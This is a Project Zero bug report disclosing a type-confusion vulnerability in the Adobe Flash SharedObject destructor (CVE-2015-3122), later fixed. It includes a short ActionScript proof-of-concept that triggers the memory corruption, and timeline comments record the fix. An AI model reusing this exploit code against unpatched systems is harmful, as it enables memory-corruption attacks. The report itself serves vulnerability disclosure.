344 - Adobe Flash: SharedObject Destructor Sets data to Normal Type - project-zero

Starred by 2 users

Status:	Fixed
Owner:	█ cevans@google.com Email to this user bounced
Closed:	Jul 2015
Cc:	project-...@google.com
Finder-natashenka Deadline-90 CVE-2015-3122 Fixed-2015-Jul-8 Id-3614 Reported-2015-Apr-24 CCProjectZeroMembers Product-Flash Severity-High Vendor-Adobe

Adobe Flash: SharedObject Destructor Sets data to Normal Type

Project Member Reported by natashenka@google.com, Apr 24 2015

Back to list

The SharedObject destructor sets the data member of the object to be of type Normal, which allows it to pass the Normal checks in other methods, leading to type confusion. A PoC is below:

var s = SharedObject.getLocal("test");
var b = new flash.display.BitmapData(10, 10, true, 10);
ASSetPropFlags(s, null, 0, 0xff);
s.data = b;
s = 1;

for(var i = 0; i < 200; i++){
	
	var q = new flash.display.BitmapData(1000, 1000, true, 10);
	
	
	}
	
setInterval(f, 2000);
function f(){
	var n = new NetConnection();
	b.__proto__ = n;
	n.connect.call(b, "http://www.google.com");
	
	}

A sample fla and swf are attached.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

shareddestruction1.swf
866 bytes Download

shareddestruction1.fla
4.8 KB Download

Comment 1 by cevans@google.com, Apr 25 2015

Labels: Id-3614

Comment 2 by cevans@google.com, Jul 5 2015

Labels: CVE-2015-3122

Comment 3 by cevans@google.com, Jul 9 2015

Labels: Fixed-2015-Jul-8
Status: Fixed

Fixed: https://helpx.adobe.com/security/products/flash-player/apsb15-16.html

Project Member Comment 4 by natashenka@google.com, Aug 3 2015

Labels: -Restrict-View-Commit

► Sign in to add a comment